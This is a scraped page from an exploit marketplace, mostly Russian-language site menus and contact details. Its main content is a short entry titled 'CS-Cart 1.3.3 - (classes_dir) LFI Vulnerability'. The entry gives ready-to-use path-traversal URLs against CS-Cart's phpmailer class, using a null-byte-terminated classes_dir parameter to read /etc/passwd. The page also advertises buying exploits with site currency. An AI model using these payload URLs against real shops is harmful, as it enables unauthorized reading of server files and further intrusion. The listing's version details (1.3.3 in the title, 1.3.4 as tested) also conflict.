[ домой ]  [ private ]  [ 0Day ]  [ discount ]  [ Получить золото ]  [ платформы ]  [ пентест ]  [ поиск ]  [ faq ]  [ контакты ]  [ стиль ]  [ Prices in Gold ]   db: 39 443    
0day.today Exploit DB Official Facebook
0day.today Exploit DB Official Twitter
0day.today Exploit DB Official RSS Channel
Tor
We DO NOT use Telegram or any messengers / social networks!
We DO NOT use Telegram or any messengers / social networks!

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

 
0day.today - наибольшая база данных эксплоитов в мире.
Выберите Ваш язык:  
English
English
Русский
Русский
Deutsch
Deutsch
Türkçe
Türkçe
Français
Français
Italiano
Italiano
Español
Español
Romania
Romania
Polskie
Polskie
العربية
العربية
Japan
Japan
China
China
Некоторые вещи, о которых стоит знать:

Мы используем один основной домен 0day.today

Если Вы желаете приобрести эксплоит или заплатить за услуги - Вам необходимо приобрести Золото (Gold).
We accept currencies: [contact admin to find more]
           
Мы не хотим чтобы Вы использовали наш сайт как инструмент для взломов, поэтому любые действия, которые могут незаконно влиять на других пользователей или на сайты, к которым у Вас нет прав доступа будут запрещены и Ваш профиль со всей вложенной информацией будет уничтожен.

Администрация сайта использует официальные контакты. Опасайтесь обманщиков!
We DO NOT use Telegram or any messengers / social networks! We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Я зарегистрированный пользователь 0day.today. Я не желаю видеть это окно в будущем.
С чего начать?
  1. Прочитайте [ соглашение ]
  2. Прочитайте [ Отправить ] правила
  3. Посетите страницу [ faq ] page
  4. [ Зарегистрируйте ] профиль
  5. Получите [ Gold ]
  6. Если Вы хотите [ продать ]
  7. Если Вы хотите [ купить ]
  8. Если Вы потеряли [ Счет ]
  9. Любые вопросы [ [email protected] ]


Основные ссылки


Вы можете связаться с нами по

Mail:
[email protected]
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
[ authorization ] [ registration ] [ Восстановление ]
Свяжитесь с нами
Вы можете связаться с нами по:
Mail:
[email protected]
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
0day.today магазин эксплоитов и 0day база данных эксплоитов

CS-Cart 1.3.3 - (classes_dir) LFI Vulnerability

Автор
0xmmnbassel
Риск
[
Security Risk High
]
0day-ID
0day-ID-35048
Категория
web applications
Дата добавления
16-10-2020
Платформа
php
# Exploit Title: CS-Cart unauthenticated LFI
# Exploit Author:  0xmmnbassel
# Vendor Homepage: https://www.cs-cart.com/e-commerce-platform.html
# Tested at: ver. 1.3.4
# Vulnerability Type: unauthenticated LFI


http://www.site.com/[CS-Cart_path]/classes/phpmailer/class.cs_phpmailer.php?classes_dir=[evil_scripts]%00
example: 
http://www.site.com/[CS-Cart_path]/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00
http://www.site.com/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00

#  0day.today [2024-06-30]  #
База данных эксплоитов разделена по типам эксплоитов (локальные, удаленные, DoS, PoC, другие.)
Отправляйте все пожелания на адреса mr.inj3ct0r[at]gmail.com
Copyright © 2008-2024 0day Today Team